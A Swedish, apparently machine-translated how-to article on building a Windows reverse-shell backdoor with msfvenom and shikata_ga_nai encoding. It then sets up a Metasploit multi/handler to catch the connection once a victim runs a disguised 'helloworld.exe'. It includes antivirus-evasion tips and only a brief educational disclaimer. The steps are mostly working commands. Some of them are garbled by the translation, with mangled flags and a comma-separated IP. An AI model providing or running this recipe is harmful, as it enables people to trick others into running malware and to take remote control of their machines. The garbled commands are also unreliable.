Hur skapar jag en nästan oupptäckbar bakdörr med MSFvenom i Kali Linux?

Skriv msfvenom -l kodare för att visa listan över kodare
Skriv msfvenom -l kodare för att visa listan över kodare.

En bakdörr används för att kringgå säkerhetsmekanismer, ofta i hemlighet och mest påvisbart. Med hjälp av MSFvenom, kombinationen av msfpayload och msfencode, är det möjligt att skapa en bakdörr som ansluter tillbaka till angriparen genom att använda omvänd skal TCP. För att utveckla en bakdörr måste du ändra signaturen för din skadlig kod för att undvika antivirusprogram. Slutför detta projekt på ett par datorer som du har behörighet att komma åt, och under tiden lär du dig mer om datasäkerhet och hur denna typ av bakdörr fungerar.

Steg

  1. 1
    Starta kali och skjut upp terminalen.
  2. 2
    Skriv för ifconfig att visa gränssnittet och kontrollera din IP-adress.
  3. 3
    Skriv för msfvenom -l encoders att visa listan med kodare.
    • Du kommer att använda x86/shikata_ga_nai som kodare.
  4. 4
    Skriv "msfvenom -a x86 - plattformsfönster -p windows / shell / reverse_tcp LHOST = 192,168.48,129 lport = 4444 -b" \ x00" -e x86 / shikata_ga_nai -f exe> helloworld.exe
    • -a x86 - platform windows anger arkitektur som ska användas.
    • -p windows/shell/reverse_tcp anger de nyttolast som ska bädda in.
    • LHOST anger lyssnarens IP-adress.
    • LPORT anger lyssnarporten.
    • -b "\x00" anger för att undvika dålig karaktär (null byte).
    • -e x86/shikata_ga_nai anger kodarnas namn.
    • -f exe > helloWorld.exe anger formatutmatning.
  5. 5
    Skriv för msfconsole att aktivera metasploit.
    • Nu har du skapat din bakdörr. När offret klickar på helloWorld.exe aktiveras den inbäddade skalbelastningen och gör en anslutning tillbaka till ditt system. För att ta emot anslutningen måste du öppna multihanteraren i Metasploit och ställa in nyttolasten.
  6. 6
    Typ use exploit/multi/handler.
  7. 7
    Typ set payload windows/shell/reverse_tcp.
  8. 8
    Skriv för show options att kontrollera modulen.
  9. 9
    Typ set LHOST 192,168.48,129.
    • "LHOST" anger lyssnarens IP-adress.
  10. 10
    Typ set LPORT 4444.
    • "LPORT" anger lyssnarporten.
  11. 11
    Skriv run och vänta på anslutningen från offrets maskin.
  12. 12
    Vänta på att offret klickar på helloworld.exe. Då kommer du att anslutas till offrets maskin.
Skriv ange nyttolastfönster / shell / reverse_tcp
Skriv ange nyttolastfönster / shell / reverse_tcp.

Tips

  • Användning av -i <nummer> i MSFvenom representerar de iterationer som kodningen gör. Ibland kan fler iterationer hjälpa till att undvika AV-programvaran.
  • Du har lärt dig hur man skapar bakdörren och kodas med MSFvenom, men den här metoden fungerar inte perfekt mot en del av AV-programvaran idag. Anledningen till detta är på grund av exekveringsmallarna i MSFvenom. AV-leverantörerna har lagt till den statiska signaturen för dessa mallar och letar bara efter dem. Lösningen för det här problemet är att använda en annan exekveringsmall eller andra verktyg.

Varningar

  • Denna artikel är endast avsedd för utbildning. Hackning utan tillstånd eller tillstånd är oetiskt och ofta olagligt.

Saker du behöver

  • Kali Linux
  • Windows
  • Virtuell maskin
    • VirtualBox
    • VMware

Frågor och svar

  • Vad gör jag om ett fel dyker upp när jag skapar exploateringen?
    Se till att du gjorde allt korrekt och försök igen. Se till att du kör Kali Linux.

FacebookTwitterInstagramPinterestLinkedInGoogle+YoutubeRedditDribbbleBehanceGithubCodePenWhatsappEmail